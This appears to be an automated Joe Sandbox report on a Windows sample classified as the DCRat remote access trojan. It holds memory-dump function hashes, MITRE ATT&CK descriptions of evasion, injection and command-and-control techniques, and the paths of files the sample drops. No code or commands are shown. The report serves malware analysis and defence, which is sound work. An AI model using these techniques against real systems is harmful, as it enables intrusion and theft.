Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849ccd0bcb7a410a4089abc84916b372ffb7aafecb3bc0fa5369854d4e5911f2
Instruction ID: 0bbb8768eeccb3fded63d301791031d495db313db53f9464b0d02fd559b99fd2
Opcode Fuzzy Hash: 849ccd0bcb7a410a4089abc84916b372ffb7aafecb3bc0fa5369854d4e5911f2
Instruction Fuzzy Hash: 5121AC32A1C51E8FEB98EB5CE8556FE77A0FF543A0F00013BE949D2281DB2868199794

Function 00007FF848F2B230 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54a0911dd77a36c22eb08ea1503547f4f72308fafe6c80af1f9ee8471620ce7f
Instruction ID: 80d63860f735ae34ba7d85084531495e242d6d81169a5171a5af864e9d227a3a
Opcode Fuzzy Hash: 54a0911dd77a36c22eb08ea1503547f4f72308fafe6c80af1f9ee8471620ce7f
Instruction Fuzzy Hash: A021683092C64A8FEB52FB6498086EE77E0FF19341F444576C808C71D1EB38A6488B55

Function 00007FF848F104F8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e7e6fc003e310984b0d5cb770d3aaac9dc7c6403c1312ba1397b4ba769b94dc
Instruction ID: a4ad52e3dc3fdd27afc23bf7058fb8af1e8f7052c6bfb07323178b9544de5ba4
Opcode Fuzzy Hash: 7e7e6fc003e310984b0d5cb770d3aaac9dc7c6403c1312ba1397b4ba769b94dc
Instruction Fuzzy Hash: 6521A13081D68E8FEB55EBA488582AA7BE1FF19341F0405BAD409C75D2EB34A954C741

Function 00007FF848F12F28 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e95a1b5e577270dced1cdb71ec670b1278355ed918b1bce9a174a03cb93b2ddd
Instruction ID: 252b90b2f1dae7239fdc2db7d83fa0c173305d905b9a403d597ecb16b0556887
Opcode Fuzzy Hash: e95a1b5e577270dced1cdb71ec670b1278355ed918b1bce9a174a03cb93b2ddd
Instruction Fuzzy Hash: AB21B031E1D28A8FEB51FBE888192FA7BE0AF55340F04057AD408D61D6EB78AE14C755

Function 00007FF848F1ACC8 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f488961a72c22c9daaaabeb8bea86692e6446e8d4ae45353ba9b4f7e62e0b9
Instruction ID: 4196d91dbf5b758bac4458eab8a150be392d23febef9a0e0330ed50485d97565
Opcode Fuzzy Hash: a6f488961a72c22c9daaaabeb8bea86692e6446e8d4ae45353ba9b4f7e62e0b9
Instruction Fuzzy Hash: 5D11B43190D64A5FD356FB7898951E97BB0FF45351F0546B3D408CB0E3DB28A488C755

Function 00007FF848F12739 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f4214810be11ec6b1521370425f7a9af3a6699986045da0546339b28b4deca7
Instruction ID: ebacee73aceadfca38afc43cab3754a411523658f3631ebbdf2bcb59ab165da4
Opcode Fuzzy Hash: 0f4214810be11ec6b1521370425f7a9af3a6699986045da0546339b28b4deca7
Instruction Fuzzy Hash: 0D11D63081D78E8FEB55EF7488181BA3FA0FF15341F0404BAD408C65D2EB38A954C741

Function 00007FF848F105D8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 747817fe69330723ab31b7df4ed620bc1ce1401c2518695fe108fc07d766948b
Instruction ID: c3f1cc94ede99a95a5e7813ab74025919ecfb7a434549b603fb4c1e4b0039a98
Opcode Fuzzy Hash: 747817fe69330723ab31b7df4ed620bc1ce1401c2518695fe108fc07d766948b
Instruction Fuzzy Hash: D811CE3090C68E8FEB89EF24C4696BA7BA1FF19340F1054BED40AC70D2DB35A894C745

Function 00007FF848F1CF18 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549b497cffed3f766d1c8e2da1190130745059e6296263f6d541d203a34ed983
Instruction ID: 6cd912511517b99cc9c42d45ad1f98e554feb97c72cc4363ee08a6f6d728f774
Opcode Fuzzy Hash: 549b497cffed3f766d1c8e2da1190130745059e6296263f6d541d203a34ed983
Instruction Fuzzy Hash: A011697090EA5E8FE791FB68885C6BABBE0FF19341F0409BAD408C70A1EB34A184D705

Function 00007FF848F1B13A Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55afa2d67838f3a66e88c10d523b37a42e998d7534fd1513551913ad525f77fd
Instruction ID: 1a5aed4c11b42527227b60e7c6d821cae65359e94ad4da028f1f5e16d73034f7
Opcode Fuzzy Hash: 55afa2d67838f3a66e88c10d523b37a42e998d7534fd1513551913ad525f77fd
Instruction Fuzzy Hash: 7601BC30D2C64B8FE745BB2898491FEBBB0FF44380F45057AD408D60D2EF3869458745

Function 00007FF848F10608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87c2e09896f378c2a22bffb9edeabffab348e7759a23dd431616482f68c2f5b8
Instruction ID: a53aa0208e5d82d515f638a1f929bdd6a85afa62510f80aec7248973085823c4
Opcode Fuzzy Hash: 87c2e09896f378c2a22bffb9edeabffab348e7759a23dd431616482f68c2f5b8
Instruction Fuzzy Hash: 01018C30818A0E9FEB49FBA4C4586BA77A1FF18346F10087EE41EC29D1DF35A990C714

Function 00007FF848F10610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc7679dac8efc5b5c486087cdcd58ce5880c268d968965e1fdb8dd069d4974b
Instruction ID: e04f1032fcb8a2212d0145b32095a294e26541d12ca2478666b1c872c36db211
Opcode Fuzzy Hash: ebc7679dac8efc5b5c486087cdcd58ce5880c268d968965e1fdb8dd069d4974b
Instruction Fuzzy Hash: 6C016D30819A0E9FEB59EBA480592BD77A0FF28355F20047ED40EC21E1DF35A950CB04

Function 00007FF848F1BB11 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbc8f1868e44946273c4ec80b36fc7c4364441ee09144b8da73e0ab808e1fc1b
Instruction ID: a5a25bba5fb7aeed4b72ed5de17afcc2e57182668444ca07d9a322fe281f306e
Opcode Fuzzy Hash: fbc8f1868e44946273c4ec80b36fc7c4364441ee09144b8da73e0ab808e1fc1b
Instruction Fuzzy Hash: EB010870D1D21A8EDF50EF54C441AEEB7B1EB18350F14457AC009E2296DF38A9848B98

Function 00007FF848F12465 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e09512d1332217a971dc66269fc3cec98e82fc1c4394d98275e950849109753
Instruction ID: 503c0100ef7edbe34f9da1bc8ecf5cb092dd5e9e32690df92bda788689b0b804
Opcode Fuzzy Hash: 5e09512d1332217a971dc66269fc3cec98e82fc1c4394d98275e950849109753
Instruction Fuzzy Hash: 5FF0F831D5C52D8EEB54FBD4A8812FDB275FF95380F40107AD01EA60D2DF392D558A88

Function 00007FF848F1280D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d03114791f0985f401d4ee42eadedfdd592f5c0616099f0041fd9ab2ed312979
Instruction ID: 6422015dd531bdb733cafc2216f0eedc07322fc69f6d051e31061a48ef48467e
Opcode Fuzzy Hash: d03114791f0985f401d4ee42eadedfdd592f5c0616099f0041fd9ab2ed312979
Instruction Fuzzy Hash: A4F0903080E78A8FEB59AFA484592A97BA0FF65351F5404BFE809C60E2DB389854C700

Function 00007FF848F1D966 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ee452f6e5ce77535f97f8444221e628e6a03ac4382f284e47ae7e29b51de862
Instruction ID: 6813b9491942c8f1dad6a4bf19c45796a17572f1496e514eedc0e63e31f9166a
Opcode Fuzzy Hash: 2ee452f6e5ce77535f97f8444221e628e6a03ac4382f284e47ae7e29b51de862
Instruction Fuzzy Hash: 7DF01570908109CFDB44EF80C5506ED73F0EB18351F24016AD405E62D0DB79AE44CB18

Function 00007FF848F12408 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b2316996bc5d19aae12d5e84fa929e4d4b6b719c63a057984b68b35543b1f1f
Instruction ID: a0b552ba42b04fbc83ca4bfb7b3292c40ccf3371b723a68d0781f0547377144a
Opcode Fuzzy Hash: 3b2316996bc5d19aae12d5e84fa929e4d4b6b719c63a057984b68b35543b1f1f
Instruction Fuzzy Hash: A1E0EC32D5C52D8DEB54FBC1A4512FDB264AF65391F501036D01E961C2CF3D28159A98

Function 00007FF848F1CE50 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713148493ab0b935906192515e40d3d3808fd5cad14e65ede91962a1e455251b
Instruction ID: 2719d92acaf233c94bf69c11985ceed7367686815253bc920d8f2b1ba541cba2
Opcode Fuzzy Hash: 713148493ab0b935906192515e40d3d3808fd5cad14e65ede91962a1e455251b
Instruction Fuzzy Hash: F590022141A11295D2906D5464511D67270AF1025CB18463ED4C8080435A2C14804658

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 5Ixz5yVfS7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat

C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
5Ixz5yVfS7.exe

Function 005AD5D4 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197
filesleeptimeCOMMON

Function 005A9E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Function 0059A5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Function 005A00CF Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317
libraryfileloaderCOMMON

Function 005ABDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Function 0059D341 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 555
COMMON

Function 005ACB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Function 005ACE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Function 005BA058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Function 005AA2C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
COMMON

Function 005AA335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Function 005999B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Function 005AAC74 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Function 005B76BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Function 005AD287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON